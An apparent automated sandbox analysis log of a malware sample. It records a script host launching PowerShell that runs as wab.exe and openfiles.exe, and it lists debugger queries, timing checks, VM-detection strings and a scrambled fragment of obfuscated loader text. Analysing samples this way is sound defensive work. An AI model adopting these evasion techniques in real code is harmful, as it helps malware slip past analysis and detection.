Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\openfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D1C0 rdtsc 12_2_2028D1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887993BFB sldt word ptr [eax] 3_2_00007FF887993BFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3943
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5893
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5353
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4377
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.3 %
Source: C:\Windows\System32\wscript.exe TID: 6248 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 748 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916 Thread sleep count: 5353 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916 Thread sleep count: 4377 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4324 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\openfiles.exe TID: 1668 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\openfiles.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: wscript.exe, 00000000.00000003.1587636884.0000023238D46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.O
Source: wscript.exe, 00000000.00000003.1587421505.0000023238BFD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1587421505.0000023238BF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: wscript.exe, 00000000.00000003.1587549677.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470442461.0000023238C91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1471566026.0000023238C8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589361392.0000023238CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589286696.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1479603781.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470481390.0000023238C94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470823040.0000023238C91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1587421505.0000023238BF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D0t
Source: powershell.exe, 00000003.00000002.2071733404.000001FCF597A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWoc%SystemRoot%\system32\mswsock.dllrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.iduns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\openfiles.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D1C0 rdtsc 12_2_2028D1C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_02B8D8BC LdrInitializeThunk,LdrInitializeThunk, 9_2_02B8D8BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A020 mov eax, dword ptr fs:[00000030h] 12_2_2020A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020C020 mov eax, dword ptr fs:[00000030h] 12_2_2020C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D903E mov eax, dword ptr fs:[00000030h] 12_2_202D903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E016 mov eax, dword ptr fs:[00000030h] 12_2_2022E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5060 mov eax, dword ptr fs:[00000030h] 12_2_202E5060
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023C073 mov eax, dword ptr fs:[00000030h] 12_2_2023C073
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov eax, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20221070 mov ecx, dword ptr fs:[00000030h] 12_2_20221070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D070 mov ecx, dword ptr fs:[00000030h] 12_2_2028D070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20212050 mov eax, dword ptr fs:[00000030h] 12_2_20212050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B052 mov eax, dword ptr fs:[00000030h] 12_2_2023B052
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202B705E mov ebx, dword ptr fs:[00000030h] 12_2_202B705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202B705E mov eax, dword ptr fs:[00000030h] 12_2_202B705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D60B8 mov eax, dword ptr fs:[00000030h] 12_2_202D60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D60B8 mov ecx, dword ptr fs:[00000030h] 12_2_202D60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021208A mov eax, dword ptr fs:[00000030h] 12_2_2021208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020D08D mov eax, dword ptr fs:[00000030h] 12_2_2020D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023D090 mov eax, dword ptr fs:[00000030h] 12_2_2023D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20215096 mov eax, dword ptr fs:[00000030h] 12_2_20215096
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024909C mov eax, dword ptr fs:[00000030h] 12_2_2024909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A0E3 mov ecx, dword ptr fs:[00000030h] 12_2_2020A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202350E4 mov eax, dword ptr fs:[00000030h] 12_2_202350E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202350E4 mov ecx, dword ptr fs:[00000030h] 12_2_202350E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202180E9 mov eax, dword ptr fs:[00000030h] 12_2_202180E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020C0F0 mov eax, dword ptr fs:[00000030h] 12_2_2020C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202520F0 mov ecx, dword ptr fs:[00000030h] 12_2_202520F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202270C0 mov ecx, dword ptr fs:[00000030h] 12_2_202270C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D0C0 mov eax, dword ptr fs:[00000030h] 12_2_2028D0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202920DE mov eax, dword ptr fs:[00000030h] 12_2_202920DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E50D9 mov eax, dword ptr fs:[00000030h] 12_2_202E50D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202390DB mov eax, dword ptr fs:[00000030h] 12_2_202390DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20240124 mov eax, dword ptr fs:[00000030h] 12_2_20240124
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211131 mov eax, dword ptr fs:[00000030h] 12_2_20211131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B136 mov eax, dword ptr fs:[00000030h] 12_2_2020B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BA118 mov ecx, dword ptr fs:[00000030h] 12_2_202BA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BA118 mov eax, dword ptr fs:[00000030h] 12_2_202BA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BA118 mov eax, dword ptr fs:[00000030h] 12_2_202BA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BA118 mov eax, dword ptr fs:[00000030h] 12_2_202BA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D0115 mov eax, dword ptr fs:[00000030h] 12_2_202D0115
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A9179 mov eax, dword ptr fs:[00000030h] 12_2_202A9179
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209148 mov eax, dword ptr fs:[00000030h] 12_2_20209148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209148 mov eax, dword ptr fs:[00000030h] 12_2_20209148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209148 mov eax, dword ptr fs:[00000030h] 12_2_20209148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209148 mov eax, dword ptr fs:[00000030h] 12_2_20209148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h] 12_2_202A4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h] 12_2_202A4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A4144 mov ecx, dword ptr fs:[00000030h] 12_2_202A4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h] 12_2_202A4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h] 12_2_202A4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20217152 mov eax, dword ptr fs:[00000030h] 12_2_20217152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20216154 mov eax, dword ptr fs:[00000030h] 12_2_20216154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20216154 mov eax, dword ptr fs:[00000030h] 12_2_20216154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020C156 mov eax, dword ptr fs:[00000030h] 12_2_2020C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5152 mov eax, dword ptr fs:[00000030h] 12_2_202E5152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h] 12_2_202C11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h] 12_2_202C11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h] 12_2_202C11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h] 12_2_202C11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022B1B0 mov eax, dword ptr fs:[00000030h] 12_2_2022B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20250185 mov eax, dword ptr fs:[00000030h] 12_2_20250185
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CC188 mov eax, dword ptr fs:[00000030h] 12_2_202CC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CC188 mov eax, dword ptr fs:[00000030h] 12_2_202CC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029019F mov eax, dword ptr fs:[00000030h] 12_2_2029019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029019F mov eax, dword ptr fs:[00000030h] 12_2_2029019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029019F mov eax, dword ptr fs:[00000030h] 12_2_2029019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029019F mov eax, dword ptr fs:[00000030h] 12_2_2029019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20267190 mov eax, dword ptr fs:[00000030h] 12_2_20267190
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h] 12_2_2020A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h] 12_2_2020A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h] 12_2_2020A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E61E5 mov eax, dword ptr fs:[00000030h] 12_2_202E61E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202151ED mov eax, dword ptr fs:[00000030h] 12_2_202151ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202401F8 mov eax, dword ptr fs:[00000030h] 12_2_202401F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E51CB mov eax, dword ptr fs:[00000030h] 12_2_202E51CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D61C3 mov eax, dword ptr fs:[00000030h] 12_2_202D61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D61C3 mov eax, dword ptr fs:[00000030h] 12_2_202D61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024D1D0 mov eax, dword ptr fs:[00000030h] 12_2_2024D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024D1D0 mov ecx, dword ptr fs:[00000030h] 12_2_2024D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5227 mov eax, dword ptr fs:[00000030h] 12_2_202E5227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020823B mov eax, dword ptr fs:[00000030h] 12_2_2020823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20247208 mov eax, dword ptr fs:[00000030h] 12_2_20247208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20247208 mov eax, dword ptr fs:[00000030h] 12_2_20247208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20214260 mov eax, dword ptr fs:[00000030h] 12_2_20214260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20214260 mov eax, dword ptr fs:[00000030h] 12_2_20214260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20214260 mov eax, dword ptr fs:[00000030h] 12_2_20214260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DD26B mov eax, dword ptr fs:[00000030h] 12_2_202DD26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DD26B mov eax, dword ptr fs:[00000030h] 12_2_202DD26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020826B mov eax, dword ptr fs:[00000030h] 12_2_2020826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20251270 mov eax, dword ptr fs:[00000030h] 12_2_20251270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20251270 mov eax, dword ptr fs:[00000030h] 12_2_20251270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20239274 mov eax, dword ptr fs:[00000030h] 12_2_20239274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
